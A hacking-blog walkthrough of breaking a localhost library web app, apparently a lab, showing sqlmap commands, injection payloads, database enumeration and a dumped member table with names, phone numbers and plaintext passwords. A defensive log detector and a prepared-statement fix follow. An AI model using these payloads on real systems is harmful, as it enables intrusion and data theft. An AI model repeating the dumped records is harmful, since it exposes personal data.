Web Application Vulnerability Check

Hi folks,
Today I will show you "The Most Vulnerable Web Application Ever" LOL
First, I check robots.txt to find every URL that is hidden from web spiders, since those are often the important URLs that may have vulnerabilities.
My target URL is http://localhost/sips/perpustakaan/

Then I check the folder URLs one by one.

Directory Traversal is working and I got an important file too, so next I check whether the file is accessible when I'm not logged in.

LOL, I'm not logged in, but the top-right menu says "Logout"; when I try to edit, the menu says "Login".

But I didn't get any password yet, so I will dump the database using sqlmap.
First I check whether the page is vulnerable to SQL injection or not.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://localhost/sips/perpustakaan/proses/anggota_update1.php?id=301 --dbs

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:47:53

[01:47:54] [INFO] testing connection to the target url
[01:47:54] [INFO] testing if the url is stable, wait a few seconds
[01:47:55] [INFO] url is stable
[01:47:55] [INFO] testing if GET parameter 'id' is dynamic
[01:47:55] [WARNING] GET parameter 'id' appears to be not dynamic
[01:47:55] [WARNING] reflective value(s) found and filtering out
[01:47:55] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[01:47:55] [INFO] testing for SQL injection on GET parameter 'id'
[01:47:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:47:55] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string='Jl. Unggas No. 222')
[01:47:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[01:47:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[01:47:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:47:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[01:47:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[01:47:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[01:47:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:47:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[01:48:06] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 
[01:48:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[01:48:06] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[01:48:06] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:48:06] [INFO] target url appears to have 5 columns in query
[01:48:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=301' AND 6492=6492 AND 'qOLK'='qOLK

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=301' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a6c6b6b3a,0x7a6a7a6d4f6447537172,0x3a6567673a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=301' AND SLEEP(5) AND 'CNyM'='CNyM
---

[01:48:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[01:48:28] [INFO] fetching database names
[01:48:28] [INFO] the SQL query used returns 5 entries
[01:48:28] [INFO] retrieved: "information_schema"
[01:48:28] [INFO] retrieved: "dvwa"
[01:48:28] [INFO] retrieved: "mysql"
[01:48:28] [INFO] retrieved: "owasp10"
[01:48:28] [INFO] retrieved: "sips"
available databases [5]:                                                       
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10
[*] sips

[01:48:28] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 01:48:28

root@bt:/pentest/database/sqlmap# 

Wow, I got 5 databases there. I choose the "sips" database because it looks like my target database, then list its tables.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://localhost/sips/perpustakaan/proses/anggota_update1.php?id=301 -D sips --tables

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:49:32

[01:49:32] [INFO] resuming back-end DBMS 'mysql' 
[01:49:32] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=301' AND 6492=6492 AND 'qOLK'='qOLK

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=301' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a6c6b6b3a,0x7a6a7a6d4f6447537172,0x3a6567673a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=301' AND SLEEP(5) AND 'CNyM'='CNyM
---

[01:49:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[01:49:32] [INFO] fetching tables for database: 'sips'
[01:49:32] [WARNING] reflective value(s) found and filtering out
[01:49:32] [INFO] the SQL query used returns 8 entries
[01:49:32] [INFO] retrieved: "anggota"
[01:49:32] [INFO] retrieved: "buku"
[01:49:32] [INFO] retrieved: "bukutamu"
[01:49:32] [INFO] retrieved: "koleksi"
[01:49:32] [INFO] retrieved: "pegawai"
[01:49:32] [INFO] retrieved: "pengarang"
[01:49:32] [INFO] retrieved: "pinjam"
[01:49:32] [INFO] retrieved: "upload_gambar"
Database: sips                                                                 
[8 tables]
+---------------+
| anggota       |
| buku          |
| bukutamu      |
| koleksi       |
| pegawai       |
| pengarang     |
| pinjam        |
| upload_gambar |
+---------------+

[01:49:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 01:49:33

root@bt:/pentest/database/sqlmap# 

I've got the table list, so I'm going to dump the "anggota" table.
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://localhost/sips/perpustakaan/proses/anggota_update1.php?id=301 -T anggota --dump

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:57:12

[01:57:12] [INFO] resuming back-end DBMS 'mysql' 
[01:57:12] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=301' AND 6492=6492 AND 'qOLK'='qOLK

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=301' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(0x3a6c6b6b3a,0x7a6a7a6d4f6447537172,0x3a6567673a)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=301' AND SLEEP(5) AND 'CNyM'='CNyM
---

[01:57:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0.11
[01:57:12] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[01:57:12] [INFO] fetching current database
[01:57:12] [INFO] fetching columns for table 'anggota' in database 'sips'
[01:57:12] [INFO] the SQL query used returns 5 entries
[01:57:12] [INFO] resumed: "username","varchar(10)"
[01:57:12] [INFO] resumed: "password","varchar(50)"
[01:57:12] [INFO] resumed: "nama_anggota","varchar(30)"
[01:57:12] [INFO] resumed: "alamat","varchar(50)"
[01:57:12] [INFO] resumed: "telpon","varchar(20)"
[01:57:13] [INFO] fetching entries for table 'anggota' in database 'sips'                         
[01:57:13] [INFO] the SQL query used returns 10 entries
[01:57:13] [INFO] resumed: "Jl. Unggas No. 222","Sri Setia Bella","bella123","085743240471","301"
[01:57:13] [INFO] resumed: "Jl. Pura","Nurdiansah","dian700","081372348721","302"
[01:57:13] [INFO] resumed: "Jl. Janti No. 21","Usman Ngadiran","diran921","087878342192","303"
[01:57:13] [INFO] resumed: "Jl. Pramuka","Beni Arsadi","bendot","085742340211","304"
[01:57:13] [INFO] resumed: "Jl. Sorowajan Baru","I Kadek Supri Adinata","kdsupriaja","0813325764...
[01:57:13] [INFO] resumed: "Jl. Karanggayam","Aprilia","april14","085266488190","306"
[01:57:13] [INFO] resumed: "Jl. Kelantan","Muh. Safee Sali","s4l14j4","085251322563","307"
[01:57:13] [INFO] resumed: "Jl. Magelang","Ucil","ucil","085266734691","309"
[01:57:13] [INFO] resumed: "Jl. Unggas No. 222","Becil","becil123","081392590471","becil"
[01:57:13] [INFO] resumed: "test","test","test","000","test"
[01:57:13] [INFO] analyzing table dump for possible password hashes                               
Database: sips
Table: anggota
[10 entries]
+--------------+--------------------+----------+------------+-----------------------+
| telpon       | alamat             | username | password   | nama_anggota          |
+--------------+--------------------+----------+------------+-----------------------+
| 085743240471 | Jl. Unggas No. 222 | 301      | bella123   | Sri Setia Bella       |
| 081372348721 | Jl. Pura           | 302      | dian700    | Nurdiansah            |
| 087878342192 | Jl. Janti No. 21   | 303      | diran921   | Usman Ngadiran        |
| 085742340211 | Jl. Pramuka        | 304      | bendot     | Beni Arsadi           |
| 081332576431 | Jl. Sorowajan Baru | 305      | kdsupriaja | I Kadek Supri Adinata |
| 085266488190 | Jl. Karanggayam    | 306      | april14    | Aprilia               |
| 085251322563 | Jl. Kelantan       | 307      | s4l14j4    | Muh. Safee Sali       |
| 085266734691 | Jl. Magelang       | 309      | ucil       | Ucil                  |
| 081392590471 | Jl. Unggas No. 222 | becil    | becil123   | Becil                 |
| 000          | test               | test     | test       | test                  |
+--------------+--------------------+----------+------------+-----------------------+

[01:57:13] [INFO] table 'sips.anggota' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/sips/anggota.csv'
[01:57:13] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

[*] shutting down at 01:57:13

root@bt:/pentest/database/sqlmap# 

Game Over..!!
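As an added example (not part of the original post), here is a small Python detector a defender could run over Apache access logs to spot the three probe classes sqlmap used against anggota_update1.php above: boolean-based, UNION and time-based. The log lines are constructed, and the client IPs and timestamps are assumed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines. The three flagged requests carry the
# exact payloads sqlmap reported above, URL-encoded as a browser or tool would send them.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Oct/2012:01:47:55 +0700] "GET /sips/perpustakaan/proses/anggota_update1.php?id=301 HTTP/1.1" 200 1532
127.0.0.1 - - [10/Oct/2012:01:47:55 +0700] "GET /sips/perpustakaan/proses/anggota_update1.php?id=301%27%20AND%206492%3D6492%20AND%20%27qOLK%27%3D%27qOLK HTTP/1.1" 200 1532
127.0.0.1 - - [10/Oct/2012:01:48:06 +0700] "GET /sips/perpustakaan/proses/anggota_update1.php?id=301%27%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20CONCAT%280x3a6c6b6b3a%2C0x7a6a7a6d4f6447537172%2C0x3a6567673a%29%23 HTTP/1.1" 200 1602
127.0.0.1 - - [10/Oct/2012:01:48:06 +0700] "GET /sips/perpustakaan/proses/anggota_update1.php?id=301%27%20AND%20SLEEP%285%29%20AND%20%27CNyM%27%3D%27CNyM HTTP/1.1" 200 1532
10.0.0.5 - - [10/Oct/2012:01:50:00 +0700] "GET /sips/perpustakaan/proses/anggota_update1.php?id=302 HTTP/1.1" 200 1540
"""

# One signature per injection class sqlmap found; matched against the decoded query string.
SIGNATURES = {
    "boolean-based": re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "union-based": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)'
)


def classify(path):
    """Return the set of injection classes whose signature appears in the decoded query string."""
    query = unquote_plus(path.partition("?")[2])
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}


def scan(log_text):
    """Yield (client ip, script path, sorted classes) for every request that matches a signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        kinds = classify(m["path"])
        if kinds:
            hits.append((m["ip"], m["path"].partition("?")[0], sorted(kinds)))
    return hits


def sources(hits):
    """Count flagged requests per client IP, so a burst like sqlmap's 29 probes stands out."""
    return Counter(ip for ip, _, _ in hits)


if __name__ == "__main__":
    for ip, script, kinds in scan(SAMPLE_LOG):
        print(ip, script, ", ".join(kinds))
    print(sources(scan(SAMPLE_LOG)))
```

The real fix is in the PHP: bind `id` as a parameter in a prepared statement and require a valid session before serving the edit page; the dump also shows passwords stored in plain text, which is why sqlmap's hash analysis found nothing to crack.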
